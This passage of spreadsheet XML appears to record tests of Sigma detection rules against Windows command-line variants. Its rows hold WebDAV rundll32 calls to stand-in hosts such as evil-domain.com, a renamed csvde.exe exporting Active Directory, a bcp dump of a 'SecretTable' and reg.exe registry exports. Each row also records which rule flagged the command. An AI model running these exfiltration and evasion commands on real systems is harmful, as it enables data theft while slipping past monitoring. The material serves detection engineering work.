    </row>
    <row r="100" ht="15.75" customHeight="1" s="42">
      <c r="A100" s="6" t="inlineStr">
        <is>
          <t>t1048.003</t>
        </is>
      </c>
      <c r="B100" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_webdav_client_execution</t>
        </is>
      </c>
      <c r="C100" s="6" t="inlineStr">
        <is>
          <t>WebDav Client Execution Via Rundll32.EXE</t>
        </is>
      </c>
      <c r="D100" s="6" t="inlineStr">
        <is>
          <t>2dbd9d3d-9e27-42a8-b8df-f13825c6c3d5</t>
        </is>
      </c>
      <c r="E100" s="6" t="inlineStr">
        <is>
          <t>rundll32.exe "C:\windows\system32\davclnt.dll",DavSetCookie</t>
        </is>
      </c>
      <c r="F100" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G100" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H100" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I100" s="6" t="inlineStr">
        <is>
          <t>Rundll32 Execution With Uncommon DLL Extension (c3a99af4-35a9-4668-879e-c09aeb4f2bdf)</t>
        </is>
      </c>
      <c r="J100" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K100" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="101" ht="15.75" customHeight="1" s="42">
      <c r="A101" s="6" t="inlineStr">
        <is>
          <t>t1048.003</t>
        </is>
      </c>
      <c r="B101" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_webdav_client_execution</t>
        </is>
      </c>
      <c r="C101" s="6" t="inlineStr">
        <is>
          <t>WebDav Client Execution Via Rundll32.EXE</t>
        </is>
      </c>
      <c r="D101" s="6" t="inlineStr">
        <is>
          <t>2dbd9d3d-9e27-42a8-b8df-f13825c6c3d5</t>
        </is>
      </c>
      <c r="E101" s="6" t="inlineStr">
        <is>
          <t>rundll32.exe "C:\windows\system32\davclnt.dll" ,DavSetCookie</t>
        </is>
      </c>
      <c r="F101" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G101" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H101" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I101" s="6" t="inlineStr">
        <is>
          <t>Rundll32 Execution With Uncommon DLL Extension (c3a99af4-35a9-4668-879e-c09aeb4f2bdf)</t>
        </is>
      </c>
      <c r="J101" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K101" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="102" ht="15.75" customHeight="1" s="42">
      <c r="A102" s="6" t="inlineStr">
        <is>
          <t>t1048.003</t>
        </is>
      </c>
      <c r="B102" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_webdav_client_execution</t>
        </is>
      </c>
      <c r="C102" s="6" t="inlineStr">
        <is>
          <t>WebDav Client Execution Via Rundll32.EXE</t>
        </is>
      </c>
      <c r="D102" s="6" t="inlineStr">
        <is>
          <t>2dbd9d3d-9e27-42a8-b8df-f13825c6c3d5</t>
        </is>
      </c>
      <c r="E102" s="6" t="inlineStr">
        <is>
          <t>rundll32.exe %windir%\system32\davclnt.dll,DavSetCookie</t>
        </is>
      </c>
      <c r="F102" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G102" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H102" s="6" t="b">
        <v>1</v>
      </c>
      <c r="I102" s="4" t="n"/>
      <c r="J102" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K102" s="6" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="103" ht="15.75" customHeight="1" s="42">
      <c r="A103" s="6" t="inlineStr">
        <is>
          <t>t1048.003</t>
        </is>
      </c>
      <c r="B103" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_webdav_client_execution</t>
        </is>
      </c>
      <c r="C103" s="6" t="inlineStr">
        <is>
          <t>WebDav Client Execution Via Rundll32.EXE</t>
        </is>
      </c>
      <c r="D103" s="6" t="inlineStr">
        <is>
          <t>2dbd9d3d-9e27-42a8-b8df-f13825c6c3d5</t>
        </is>
      </c>
      <c r="E103" s="6" t="inlineStr">
        <is>
          <t>rundll32.exe davclnt.dll,DavSetCookie</t>
        </is>
      </c>
      <c r="F103" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G103" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H103" s="6" t="b">
        <v>1</v>
      </c>
      <c r="I103" s="4" t="n"/>
      <c r="J103" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K103" s="6" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="104" ht="15.75" customHeight="1" s="42">
      <c r="A104" s="4" t="n"/>
      <c r="B104" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_webdav_client_susp_execution</t>
        </is>
      </c>
      <c r="C104" s="6" t="inlineStr">
        <is>
          <t>Suspicious WebDav Client Execution Via Rundll32.EXE</t>
        </is>
      </c>
      <c r="D104" s="6" t="inlineStr">
        <is>
          <t>982e9f2d-1a85-4d5b-aea4-31f5e97c6555</t>
        </is>
      </c>
      <c r="E104" s="6" t="inlineStr">
        <is>
          <t>rundll32.exe "C:\windows\system32\davclnt.dll",DavSetCookie http://203.0.113.5/share</t>
        </is>
      </c>
      <c r="F104" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G104" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H104" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I104" s="6" t="inlineStr">
        <is>
          <t>Rundll32 Execution With Uncommon DLL Extension (c3a99af4-35a9-4668-879e-c09aeb4f2bdf)</t>
        </is>
      </c>
      <c r="J104" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K104" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="105" ht="15.75" customHeight="1" s="42">
      <c r="A105" s="4" t="n"/>
      <c r="B105" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_webdav_client_susp_execution</t>
        </is>
      </c>
      <c r="C105" s="6" t="inlineStr">
        <is>
          <t>Suspicious WebDav Client Execution Via Rundll32.EXE</t>
        </is>
      </c>
      <c r="D105" s="6" t="inlineStr">
        <is>
          <t>982e9f2d-1a85-4d5b-aea4-31f5e97c6555</t>
        </is>
      </c>
      <c r="E105" s="6" t="inlineStr">
        <is>
          <t>rundll32.exe "C:\windows\system32\davclnt.dll" ,DavSetCookie http://203.0.113.5/share</t>
        </is>
      </c>
      <c r="F105" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G105" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H105" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I105" s="6" t="inlineStr">
        <is>
          <t>Rundll32 Execution With Uncommon DLL Extension (c3a99af4-35a9-4668-879e-c09aeb4f2bdf)</t>
        </is>
      </c>
      <c r="J105" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K105" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="106" ht="15.75" customHeight="1" s="42">
      <c r="A106" s="4" t="n"/>
      <c r="B106" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_webdav_client_susp_execution</t>
        </is>
      </c>
      <c r="C106" s="6" t="inlineStr">
        <is>
          <t>Suspicious WebDav Client Execution Via Rundll32.EXE</t>
        </is>
      </c>
      <c r="D106" s="6" t="inlineStr">
        <is>
          <t>982e9f2d-1a85-4d5b-aea4-31f5e97c6555</t>
        </is>
      </c>
      <c r="E106" s="6" t="inlineStr">
        <is>
          <t>rundll32.exe C:\windows\system32\davclnt.dll,DavSetCookie http://3405803781/share</t>
        </is>
      </c>
      <c r="F106" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G106" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H106" s="6" t="b">
        <v>1</v>
      </c>
      <c r="I106" s="4" t="n"/>
      <c r="J106" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K106" s="6" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="107" ht="15.75" customHeight="1" s="42">
      <c r="A107" s="4" t="n"/>
      <c r="B107" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_webdav_client_susp_execution</t>
        </is>
      </c>
      <c r="C107" s="6" t="inlineStr">
        <is>
          <t>Suspicious WebDav Client Execution Via Rundll32.EXE</t>
        </is>
      </c>
      <c r="D107" s="6" t="inlineStr">
        <is>
          <t>982e9f2d-1a85-4d5b-aea4-31f5e97c6555</t>
        </is>
      </c>
      <c r="E107" s="6" t="inlineStr">
        <is>
          <t>rundll32.exe C:\windows\system32\davclnt.dll,DavSetCookie http://evil-domain.com/share</t>
        </is>
      </c>
      <c r="F107" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G107" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H107" s="6" t="b">
        <v>1</v>
      </c>
      <c r="I107" s="4" t="n"/>
      <c r="J107" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K107" s="6" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="108" ht="15.75" customHeight="1" s="42">
      <c r="A108" s="4" t="n"/>
      <c r="B108" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_webdav_client_susp_execution</t>
        </is>
      </c>
      <c r="C108" s="6" t="inlineStr">
        <is>
          <t>Suspicious WebDav Client Execution Via Rundll32.EXE</t>
        </is>
      </c>
      <c r="D108" s="6" t="inlineStr">
        <is>
          <t>982e9f2d-1a85-4d5b-aea4-31f5e97c6555</t>
        </is>
      </c>
      <c r="E108" s="6" t="inlineStr">
        <is>
          <t>rundll32.exe davclnt.dll,DavSetCookie http://203.0.113.5/share</t>
        </is>
      </c>
      <c r="F108" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G108" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H108" s="6" t="b">
        <v>1</v>
      </c>
      <c r="I108" s="4" t="n"/>
      <c r="J108" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K108" s="6" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="109" ht="15.75" customHeight="1" s="42">
      <c r="A109" s="6" t="inlineStr">
        <is>
          <t>t1087.002</t>
        </is>
      </c>
      <c r="B109" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_csvde_export</t>
        </is>
      </c>
      <c r="C109" s="6" t="inlineStr">
        <is>
          <t>Active Directory Structure Export Via Csvde.EXE</t>
        </is>
      </c>
      <c r="D109" s="6" t="inlineStr">
        <is>
          <t>e5d36acd-acb4-4c6f-a13f-9eb203d50099</t>
        </is>
      </c>
      <c r="E109" s="6" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\csvde.exe C:\Users\Public\Update.exe &amp;&amp; C:\Users\Public\Update.exe /f C:\Users\Public\ad_export.csv</t>
        </is>
      </c>
      <c r="F109" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G109" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H109" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I109" s="6" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J109" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K109" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="110" ht="15.75" customHeight="1" s="42">
      <c r="A110" s="6" t="inlineStr">
        <is>
          <t>t1087.002</t>
        </is>
      </c>
      <c r="B110" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_csvde_export</t>
        </is>
      </c>
      <c r="C110" s="6" t="inlineStr">
        <is>
          <t>Active Directory Structure Export Via Csvde.EXE</t>
        </is>
      </c>
      <c r="D110" s="6" t="inlineStr">
        <is>
          <t>e5d36acd-acb4-4c6f-a13f-9eb203d50099</t>
        </is>
      </c>
      <c r="E110" s="6" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\csvde.exe C:\Users\Public\Update.exe &amp;&amp; C:\Users\Public\Update.exe -"f" C:\Users\Public\ad_export.csv</t>
        </is>
      </c>
      <c r="F110" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G110" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H110" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I110" s="6" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J110" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K110" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="111" ht="15.75" customHeight="1" s="42">
      <c r="A111" s="6" t="inlineStr">
        <is>
          <t>t1087.002</t>
        </is>
      </c>
      <c r="B111" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_csvde_export</t>
        </is>
      </c>
      <c r="C111" s="6" t="inlineStr">
        <is>
          <t>Active Directory Structure Export Via Csvde.EXE</t>
        </is>
      </c>
      <c r="D111" s="6" t="inlineStr">
        <is>
          <t>e5d36acd-acb4-4c6f-a13f-9eb203d50099</t>
        </is>
      </c>
      <c r="E111" s="6" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\csvde.exe C:\Users\Public\Update.exe &amp;&amp; C:\Users\Public\Update.exe /"f" C:\Users\Public\ad_export.csv</t>
        </is>
      </c>
      <c r="F111" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G111" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H111" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I111" s="6" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J111" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K111" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="112" ht="15.75" customHeight="1" s="42">
      <c r="A112" s="6" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B112" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_bcp_export_data</t>
        </is>
      </c>
      <c r="C112" s="6" t="inlineStr">
        <is>
          <t>Data Export From MSSQL Table Via BCP.EXE</t>
        </is>
      </c>
      <c r="D112" s="6" t="inlineStr">
        <is>
          <t>c615d676-f655-46b9-b913-78729021e5d7</t>
        </is>
      </c>
      <c r="E112" s="6" t="inlineStr">
        <is>
          <t>bcp "SELECT * FROM dbo.SecretTable" queryout C:\temp\export.txt -c -T -S MYSERVER -d MyDB</t>
        </is>
      </c>
      <c r="F112" s="6" t="b">
        <v>0</v>
      </c>
      <c r="G112" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H112" s="6" t="b">
        <v>1</v>
      </c>
      <c r="I112" s="4" t="n"/>
      <c r="J112" s="6" t="n">
        <v>3</v>
      </c>
      <c r="K112" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="113" ht="15.75" customHeight="1" s="42">
      <c r="A113" s="6" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B113" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_bcp_export_data</t>
        </is>
      </c>
      <c r="C113" s="6" t="inlineStr">
        <is>
          <t>Data Export From MSSQL Table Via BCP.EXE</t>
        </is>
      </c>
      <c r="D113" s="6" t="inlineStr">
        <is>
          <t>c615d676-f655-46b9-b913-78729021e5d7</t>
        </is>
      </c>
      <c r="E113" s="6" t="inlineStr">
        <is>
          <t>bcp "SELECT * FROM dbo.SecretTable" queryout C:\temp\export.txt -c -T -d MyDB -S MYSERVER</t>
        </is>
      </c>
      <c r="F113" s="6" t="b">
        <v>0</v>
      </c>
      <c r="G113" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H113" s="6" t="b">
        <v>1</v>
      </c>
      <c r="I113" s="4" t="n"/>
      <c r="J113" s="6" t="n">
        <v>3</v>
      </c>
      <c r="K113" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="114" ht="15.75" customHeight="1" s="42">
      <c r="A114" s="6" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B114" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_bcp_export_data</t>
        </is>
      </c>
      <c r="C114" s="6" t="inlineStr">
        <is>
          <t>Data Export From MSSQL Table Via BCP.EXE</t>
        </is>
      </c>
      <c r="D114" s="6" t="inlineStr">
        <is>
          <t>c615d676-f655-46b9-b913-78729021e5d7</t>
        </is>
      </c>
      <c r="E114" s="6" t="inlineStr">
        <is>
          <t>bcp "SELECT * FROM dbo.SecretTable" queryout C:\temp\export.txt -c -T -S"MYSERVER" -d"MyDB"</t>
        </is>
      </c>
      <c r="F114" s="6" t="b">
        <v>0</v>
      </c>
      <c r="G114" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H114" s="6" t="b">
        <v>1</v>
      </c>
      <c r="I114" s="4" t="n"/>
      <c r="J114" s="6" t="n">
        <v>3</v>
      </c>
      <c r="K114" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="115" ht="15.75" customHeight="1" s="42">
      <c r="A115" s="6" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B115" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_keys</t>
        </is>
      </c>
      <c r="C115" s="6" t="inlineStr">
        <is>
          <t>Exports Registry Key To a File</t>
        </is>
      </c>
      <c r="D115" s="6" t="inlineStr">
        <is>
          <t>f0e53e89-8d22-46ea-9db5-9d4796ee2f8a</t>
        </is>
      </c>
      <c r="E115" s="6" t="inlineStr">
        <is>
          <t>reg.exe export HKCU\Software C:\temp\export.reg</t>
        </is>
      </c>
      <c r="F115" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G115" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H115" s="6" t="b">
        <v>1</v>
      </c>
      <c r="I115" s="4" t="n"/>
      <c r="J115" s="6" t="n">
        <v>3</v>
      </c>
      <c r="K115" s="6" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="116" ht="15.75" customHeight="1" s="42">
      <c r="A116" s="6" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B116" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_keys</t>
        </is>
      </c>
      <c r="C116" s="6" t="inlineStr">
        <is>
          <t>Exports Registry Key To a File</t>
        </is>
      </c>
      <c r="D116" s="6" t="inlineStr">
        <is>
          <t>f0e53e89-8d22-46ea-9db5-9d4796ee2f8a</t>
        </is>
      </c>
      <c r="E116" s="6" t="inlineStr">
        <is>
          <t>reg.exe export HKCU\Software C:\temp\export.reg /y</t>
        </is>
      </c>
      <c r="F116" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G116" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H116" s="6" t="b">
        <v>1</v>
      </c>
      <c r="I116" s="4" t="n"/>
      <c r="J116" s="6" t="n">
        <v>3</v>
      </c>
      <c r="K116" s="6" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="117" ht="15.75" customHeight="1" s="42">
      <c r="A117" s="6" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B117" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_keys</t>
        </is>
      </c>
      <c r="C117" s="6" t="inlineStr">
        <is>
          <t>Exports Registry Key To a File</t>
        </is>
      </c>
      <c r="D117" s="6" t="inlineStr">
        <is>
          <t>f0e53e89-8d22-46ea-9db5-9d4796ee2f8a</t>
        </is>
      </c>
      <c r="E117" s="6" t="inlineStr">
        <is>
          <t>reg.exe export HKCU\Software C:\temp\export.reg &gt; NUL</t>
        </is>
      </c>
      <c r="F117" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G117" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H117" s="6" t="b">
        <v>1</v>
      </c>
      <c r="I117" s="4" t="n"/>
      <c r="J117" s="6" t="n">
        <v>3</v>
      </c>
      <c r="K117" s="6" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="118" ht="15.75" customHeight="1" s="42">
      <c r="A118" s="6" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B118" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_keys</t>
        </is>
      </c>
      <c r="C118" s="6" t="inlineStr">
        <is>
          <t>Exports Registry Key To a File</t>
        </is>
      </c>
      <c r="D118" s="6" t="inlineStr">
        <is>
          <t>f0e53e89-8d22-46ea-9db5-9d4796ee2f8a</t>
        </is>
      </c>
      <c r="E118" s="6" t="inlineStr">
        <is>
          <t>reg.exe export HKCU\Software C:\temp\export.reg 2&gt;&amp;1 | findstr /v "error"</t>
        </is>
      </c>
      <c r="F118" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G118" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H118" s="6" t="b">
        <v>1</v>
      </c>
      <c r="I118" s="4" t="n"/>
      <c r="J118" s="6" t="n">
        <v>3</v>
      </c>
      <c r="K118" s="6" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="119" ht="15.75" customHeight="1" s="42">
      <c r="A119" s="6" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B119" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_keys</t>
        </is>
      </c>
      <c r="C119" s="6" t="inlineStr">
        <is>
          <t>Exports Registry Key To a File</t>
        </is>
      </c>
      <c r="D119" s="6" t="inlineStr">
        <is>
          <t>f0e53e89-8d22-46ea-9db5-9d4796ee2f8a</t>
        </is>
      </c>
      <c r="E119" s="6" t="inlineStr">
        <is>
          <t>set REG_PATH=HKCU\Software &amp;&amp; reg.exe export %REG_PATH% C:\temp\export.reg</t>
        </is>
      </c>
      <c r="F119" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G119" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H119" s="6" t="b">
        <v>1</v>
      </c>
      <c r="I119" s="4" t="n"/>
      <c r="J119" s="6" t="n">
        <v>3</v>
      </c>
      <c r="K119" s="6" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="120" ht="15.75" customHeight="1" s="42">
      <c r="A120" s="6" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B120" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_keys</t>
        </is>
      </c>
      <c r="C120" s="6" t="inlineStr">
        <is>
          <t>Exports Registry Key To a File</t>
        </is>
      </c>
      <c r="D120" s="6" t="inlineStr">
        <is>
          <t>f0e53e89-8d22-46ea-9db5-9d4796ee2f8a</t>
        </is>
      </c>
      <c r="E120" s="6" t="inlineStr">
        <is>
          <t>reg.exe export HKCU\Software C:\temp\export.reg | findstr /v "error"</t>
        </is>
      </c>
      <c r="F120" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G120" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H120" s="6" t="b">
        <v>1</v>
      </c>
      <c r="I120" s="4" t="n"/>
      <c r="J120" s="6" t="n">
        <v>3</v>
      </c>
      <c r="K120" s="6" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="121" ht="15.75" customHeight="1" s="42">
      <c r="A121" s="6" t="inlineStr">
        <is>
          <t>t1048.003</t>
        </is>
      </c>
      <c r="B121" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_webdav_client_execution</t>
        </is>
      </c>
      <c r="C121" s="6" t="inlineStr">
        <is>
          <t>WebDav Client Execution Via Rundll32.EXE</t>
        </is>
      </c>
      <c r="D121" s="6" t="inlineStr">
        <is>
          <t>2dbd9d3d-9e27-42a8-b8df-f13825c6c3d5</t>
        </is>
      </c>
      <c r="E121" s="6" t="inlineStr">
        <is>
          <t>rundll32.exe C:\windows\system32\davclnt.dll,DavSetCookie</t>
        </is>
      </c>
      <c r="F121" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G121" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H121" s="6" t="b">
        <v>1</v>
      </c>
      <c r="I121" s="4" t="n"/>
      <c r="J121" s="6" t="n">
        <v>3</v>
      </c>
      <c r="K121" s="6" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="122" ht="15.75" customHeight="1" s="42">
      <c r="A122" s="6" t="inlineStr">
        <is>
          <t>t1048.003</t>
        </is>
      </c>
      <c r="B122" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_webdav_client_execution</t>
        </is>
      </c>
      <c r="C122" s="6" t="inlineStr">
        <is>
          <t>WebDav Client Execution Via Rundll32.EXE</t>
        </is>
      </c>
      <c r="D122" s="6" t="inlineStr">
        <is>
          <t>2dbd9d3d-9e27-42a8-b8df-f13825c6c3d5</t>
        </is>
      </c>
      <c r="E122" s="6" t="inlineStr">
        <is>
          <t>rundll32.exe C:\\windows\system32\davclnt.dll,DavSetCookie</t>
        </is>
      </c>
      <c r="F122" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G122" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H122" s="6" t="b">
        <v>1</v>
      </c>
      <c r="I122" s="4" t="n"/>
      <c r="J122" s="6" t="n">
        <v>3</v>
      </c>
      <c r="K122" s="6" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="123" ht="15.75" customHeight="1" s="42">
      <c r="A123" s="6" t="inlineStr">
        <is>
          <t>t1048.003</t>
        </is>
      </c>
      <c r="B123" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_webdav_client_susp_execution</t>
        </is>
      </c>
      <c r="C123" s="6" t="inlineStr">
        <is>
          <t>Suspicious WebDav Client Execution Via Rundll32.EXE</t>
        </is>
      </c>
      <c r="D123" s="6" t="inlineStr">
        <is>
          <t>982e9f2d-1a85-4d5b-aea4-31f5e97c6555</t>
        </is>
      </c>
      <c r="E123" s="6" t="inlineStr">
        <is>
          <t>rundll32.exe davclnt.dll,DavSetCookie http://203.0.113.5/share</t>
        </is>
      </c>
      <c r="F123" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G123" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H123" s="6" t="b">
        <v>1</v>
      </c>
      <c r="I123" s="4" t="n"/>
      <c r="J123" s="6" t="n">
        <v>3</v>
      </c>
      <c r="K123" s="6" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="124" ht="15.75" customHeight="1" s="42">
      <c r="A124" s="6" t="inlineStr">
        <is>
          <t>t1048.003</t>
        </is>
      </c>
      <c r="B124" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_webdav_client_susp_execution</t>
        </is>
      </c>
      <c r="C124" s="6" t="inlineStr">
        <is>
          <t>Suspicious WebDav Client Execution Via Rundll32.EXE</t>
        </is>
      </c>
      <c r="D124" s="6" t="inlineStr">
        <is>
          <t>982e9f2d-1a85-4d5b-aea4-31f5e97c6555</t>
        </is>
      </c>
      <c r="E124" s="6" t="inlineStr">
        <is>
          <t>rundll32.exe davclnt.dll,DavSetCookie http://evil-domain.com/share</t>
        </is>
      </c>
      <c r="F124" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G124" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H124" s="6" t="b">
        <v>1</v>
      </c>
      <c r="I124" s="4" t="n"/>
      <c r="J124" s="6" t="n">
        <v>3</v>
      </c>
      <c r="K124" s="6" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="125" ht="15.75" customHeight="1" s="42">
      <c r="A125" s="6" t="inlineStr">
        <is>
          <t>t1048.003</t>
        </is>
      </c>
      <c r="B125" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_webdav_client_susp_execution</t>
        </is>
      </c>
      <c r="C125" s="6" t="inlineStr">
        <is>
          <t>Suspicious WebDav Client Execution Via Rundll32.EXE</t>
        </is>
      </c>
      <c r="D125" s="6" t="inlineStr">
        <is>
          <t>982e9f2d-1a85-4d5b-aea4-31f5e97c6555</t>
        </is>
      </c>
      <c r="E125" s="6" t="inlineStr">
        <is>
          <t>rundll32.exe davclnt.dll,DavSetCookie http://[2001:db8::1]/share</t>
        </is>
      </c>
      <c r="F125" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G125" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H125" s="6" t="b">
        <v>1</v>
      </c>
      <c r="I125" s="4" t="n"/>
      <c r="J125" s="6" t="n">
        <v>3</v>
      </c>
      <c r="K125" s="6" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="126" ht="15.75" customHeight="1" s="42">
      <c r="A126" s="6" t="inlineStr">
        <is>
          <t>t1048.003</t>
        </is>
      </c>
      <c r="B126" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_webdav_client_susp_execution</t>
        </is>
      </c>
      <c r="C126" s="6" t="inlineStr">
        <is>
          <t>Suspicious WebDav Client Execution Via Rundll32.EXE</t>
        </is>
      </c>
      <c r="D126" s="6" t="inlineStr">
        <is>
          <t>982e9f2d-1a85-4d5b-aea4-31f5e97c6555</t>
        </is>
      </c>
      <c r="E126" s="6" t="inlineStr">
        <is>
          <t>rundll32.exe davclnt.dll,DavSetCookie http://192.168.1.1/share</t>
        </is>
      </c>
      <c r="F126" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G126" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H126" s="6" t="b">
        <v>1</v>
      </c>
      <c r="I126" s="4" t="n"/>
      <c r="J126" s="6" t="n">
        <v>3</v>
      </c>
      <c r="K126" s="6" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="127" ht="15.75" customHeight="1" s="42">
      <c r="A127" s="6" t="inlineStr">
        <is>
          <t>t1048.003</t>
        </is>
      </c>
      <c r="B127" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_webdav_client_susp_execution</t>
